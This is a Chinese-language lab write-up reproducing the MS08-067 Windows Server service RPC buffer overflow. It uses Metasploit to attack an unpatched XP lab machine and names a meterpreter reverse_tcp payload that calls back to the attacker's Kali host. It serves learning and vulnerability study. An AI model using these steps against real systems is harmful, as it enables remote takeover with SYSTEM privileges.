ms08-067漏洞复现
文章目录
ms08-067简介
Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)。
- 漏洞类别:远程溢出
- CVE-ID : 2008-4250
漏洞详情:
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。
参考链接:
Windows Server服务 RPC请求缓冲区溢出漏洞
Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)
复现
实验环境
未打补丁的xp:192.168.43.199
kali:192.168.43.185
两台主机之间可以通信。
漏洞利用
首先进入msfconsole,寻找ms08-067相关的攻击模块。
这里只有一个可用的exploit模块,use它。
然后show targets查看一下,该模块都适用于哪些windows版本。
本次实验的主机是xp3 simplified。
这里将目标主机的类型设置。
然后看一下需要配置哪些参数show options
这里设置一下rhosts即可。
然后查看一下有哪些可用的payload;show payloads
这里选择44号。set pyaload windows/meterpreter/reverse_tcp
然后再看一下payload需要配置哪些参数show options
需要配置lohost和lport;配置监听地址和监听端口。监听端口有默认值,这里就只配置监听地址为kali的IP。
然后开始渗透
如图所示渗透成功。
未解决:
进入cmd后,存在乱码问题。